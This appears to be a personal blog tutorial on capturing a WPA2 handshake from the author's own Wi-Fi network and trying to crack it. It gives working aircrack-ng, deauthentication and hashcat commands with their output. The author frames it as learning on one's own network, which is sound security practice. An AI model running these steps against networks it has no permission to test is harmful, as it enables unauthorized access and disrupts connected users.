Recording Wifi Handshakes
Recording Wifi Handshakes
Something cool I wanted to learn how to do was record Wifi handshakes. This is just a fun project I wanted to try. In this tutorial I record a handshake on my local network. My plan was to see how easy it would be to guess my own Wifi password. Remember to only use this on your own network and devices for learning purposes.
Setup Packages
The first step is to install the necessary packages. This will install what you need.
sudo apt update && sudo apt install -y \
aircrack-ng \
hcxtools \
hashcat
Activate Wifi Monitor
Not all Wifi cards support this. Do some research on this before buying anything to do this. My built-in Wifi adapter supports it so that’s what I will be using. This will rename the interface by appending mon to the name.
Here is a list of interfaces I have before activating monitor mode.
xadlien@swift3x:~$ ip l
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: wlp0s20f3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DORMANT group default qlen 1000
Now activate monitor mode.
dan@ubuntu:~$ sudo airmon-ng start wlp0s20f3
Found 4 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
1248 avahi-daemon
1255 NetworkManager
1299 wpa_supplicant
1308 avahi-daemon
PHY Interface Driver Chipset
phy0 wlp0s20f3 iwlwifi 14.3 Network controller: Intel Corporation Wi-Fi 6 AX201 (rev 20)
(mac80211 monitor mode vif enabled for [phy0]wlp0s20f3 on [phy0]wlp0s20f3mon)
(mac80211 station mode vif disabled for [phy0]wlp0s20f3)
We should see the new interface now.
xadlien@swift3x:~$ ip l
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: wlp0s20f3mon: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
Find the BSSID
The next step is to find the BSSID of the network you want to monitor. So we need to monitor everything and find the network BSSID. Run the following and wait a few seconds. Remember to use your interface name in the command instead.
sudo airodump-ng wlp0s20f3mon
After a few seconds you should see something like this:
CH 4 ][ Elapsed: 24 s ][ 2022-04-02 20:53
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
44:07:0B:03:41:F7 -21 17 1 0 1 130 WPA2 CCMP PSK Ralphthecat
44:07:0B:03:3F:9A -27 20 1 0 6 130 WPA2 CCMP PSK Ralphthecat
44:07:0B:00:D2:30 -28 4 0 0 1 130 WPA2 CCMP PSK Ralphthecat
10:0C:6B:D3:2A:0B -26 4 1 0 5 195 WPA2 CCMP PSK NETGEAR87
24:A0:74:79:C0:42 -44 24 31 0 11 195 WPA2 CCMP PSK Proverbs 3:5-6
10:0C:6B:4E:6A:7D -63 9 5 0 8 195 WPA2 CCMP PSK NETGEAR14
BSSID STATION PWR Rate Lost Frames Notes Probes
(not associated) AA:6C:6E:11:9F:17 -63 0 - 1 0 1
(not associated) 96:A7:99:6E:D0:B8 -70 0 - 1 0 2
(not associated) 64:52:99:C7:67:5E -87 0 - 1 0 5 belkin.13a
44:07:0B:00:D2:30 24:62:AB:3C:95:17 -88 0 - 6 0 1
24:A0:74:79:C0:42 6E:06:1E:B3:B7:43 -66 0 - 1 761 11
24:A0:74:79:C0:42 64:1C:AE:76:7E:F4 -60 0 -24e 0 8
24:A0:74:79:C0:42 F0:A3:B2:21:D5:F4 -61 24e- 1 0 3
24:A0:74:79:C0:42 86:A2:53:23:D4:20 -63 24e- 1 36 6
24:A0:74:79:C0:42 02:A8:DE:8E:28:FC -69 0 - 1 0 6
24:A0:74:79:C0:42 5C:86:C1:15:CF:CB -73 0 -12 0 1
24:A0:74:79:C0:42 F6:AD:56:6B:89:60 -77 1e-11 0 4
I want the Proverbs 3:5-6 network so I will use the BSSID 24:A0:74:79:C0:42.
Start Capturing Handshakes
Next we need to start capturing handshakes on that network and wait for one to occur. Leave the following command run to see if you can get a handshake.
sudo airodump-ng --bssid 24:A0:74:79:C0:42 -w capture1 --output-format pcap -c 11wlp0s20f3mon
Notice I’m using channel 11 since that is the channel that this BSSID is broadcasting on. The output should look like the following. Notice the “WPA Handshake” in the upper right corner.
CH 11 ][ Elapsed: 18 s ][ 2022-04-02 21:05 ][ WPA handshake: 24:A0:74:79:C0:42
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH
24:A0:74:79:C0:42 -47 100 185 958 65 11 195 WPA2 CCMP PSK
BSSID STATION PWR Rate Lost Frames Notes Pro
24:A0:74:79:C0:42 A6:3B:D2:CF:0E:A1 -36 1e-24e 299 9
24:A0:74:79:C0:42 60:5B:B4:56:B9:9F -48 1e- 1e 10 24 EAPOL
24:A0:74:79:C0:42 86:A2:53:23:D4:20 -67 1e- 1 386 87
24:A0:74:79:C0:42 02:A8:DE:8E:28:FC -65 1e- 1 0 15
24:A0:74:79:C0:42 02:64:EE:05:57:75 -67 24e-24 55 127 EAPOL
24:A0:74:79:C0:42 64:1C:AE:76:7E:F4 -60 24e-24e 582 554 EAPOL Prov
24:A0:74:79:C0:42 F0:A3:B2:21:D5:F4 -64 24e- 1 0 10
24:A0:74:79:C0:42 6E:06:1E:B3:B7:43 -65 1e- 1 0 4
24:A0:74:79:C0:42 5C:86:C1:15:CF:CB -73 1e-24 29 46 EAPOL
24:A0:74:79:C0:42 14:01:52:CB:8B:E2 -72 1e- 1e 307 7
24:A0:74:79:C0:42 F6:AD:56:6B:89:60 -77 1e-11 1 5
24:A0:74:79:C0:42 24:FC:E5:8A:A3:70 -81 0 -11e 0 2
Forcing Handshakes
If you don’t want to wait for someone to connect to the network you can always force a handshake by sending deauth packets to devices on the network. Run the following to send deauth packets and the handshake should occur.
sudo aireplay-ng -0 1 -a 24:A0:74:79:C0:42 wlp0s20f3mon
You should see the WPA Handshake now.
Convert to hc22000
Now we need to convert this file to be used with Hashcat. The reason we do this is to ensure the file is in a proper format for Hashcat. We will use hcxpcapngtool.
hcxpcapngtool -o proverbs.hc22000 capture1-*.cap
Hashcat
Hashcat is a great tool to attempt to crack a password hash. The reason I’m using this tool is because it works with GPUs. I have an RTX 3060 and it’ll make the cracking process incredibly fast (sort of). We will go through two good ways to attempt a password crack. I say attempt because if the password is not simple or in a wordlist it may never finish.
Hashcat Pattern
The first thing we will try is using hashcat with a pattern. Unfortunately this may take a very long time. Let’s see just how long. Notice this pattern is using a bunch of lowercase characters. For more info on that please read the documentation for hashcat.
hashcat -m 22000 proverbs.hc22000 -a 3 ?l?l?l?l?l?l?l?l?l?l?l
Now with the status we can see it will take about 297 years with an RTX 3060.
hashcat (v6.1.1) starting...
CUDA API (CUDA 11.4)
====================
* Device #1: NVIDIA GeForce RTX 3060, 11952/12053 MB, 28MCU
OpenCL API (OpenCL 3.0 CUDA 11.4.189) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: NVIDIA GeForce RTX 3060, skipped
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63
Hashes: 4 digests; 4 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Applicable optimizers applied:
* Zero-Byte
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 555 MB
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
Session..........: hashcat
Status...........: Running
Hash.Name........: WPA-PBKDF2-PMKID+EAPOL
Hash.Target......: proverbs.hc22000
Time.Started.....: Sun Apr 3 15:18:55 2022 (3 secs)
Time.Estimated...: Mon Apr 14 01:27:18 2319 (297 years, 9 days)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?l?l?l [11]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 391.6 kH/s (9.06ms) @ Accel:8 Loops:64 Thr:1024 Vec:1
Recovered........: 0/4 (0.00%) Digests
Progress.........: 1146880/3670344486987776 (0.00%)
Rejected.........: 0/1146880 (0.00%)
Restore.Point....: 0/141167095653376 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:5-6 Iteration:3968-4032
Candidates.#1....: parierinere -> piarkerdere
Hardware.Mon.#1..: Temp: 27c Fan: 0% Util:100% Core:1995MHz Mem:7300MHz Bus:4
Hashcat Wordlist
The second way we can approach this is by using a wordlist. A good one is the rockyou.txt file. It contains a lot of passwords that people may use. Advice is if your password is in that file, find a new one.
hashcat -m 22000 proverbs.hc22000 -a 0 < ~/Downloads/rockyou.txt
If the password is in the wordlist then you’ll see a status of “Cracked” at the end. Fortunately for my wifi network it’s “Exhausted” which means the wordlist didn’t contain the password.
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: WPA-PBKDF2-PMKID+EAPOL
Hash.Target......: proverbs.hc22000
Time.Started.....: Sun Apr 3 15:26:04 2022 (30 secs)
Time.Estimated...: Sun Apr 3 15:26:34 2022 (0 secs)
Guess.Base.......: Pipe
Speed.#1.........: 318.9 kH/s (8.81ms) @ Accel:8 Loops:64 Thr:1024 Vec:1
Recovered........: 0/4 (0.00%) Digests
Progress.........: 14344384
Rejected.........: 4734913
Restore.Point....: 0
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:3-7
Candidates.#1....: $HEX[303332333237353637] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 57c Fan: 59% Util:100% Core:1957MHz Mem:7300MHz Bus:4
Started: Sun Apr 3 15:26:03 2022
Stopped: Sun Apr 3 15:26:35 2022
Final Thoughts
This type of hash guessing can be used in a lot of different ways. Unix password cracking is also an application I may try for fun. Remember to only do this stuff on your own networks. I take no responsibility for what you do with this knowledge.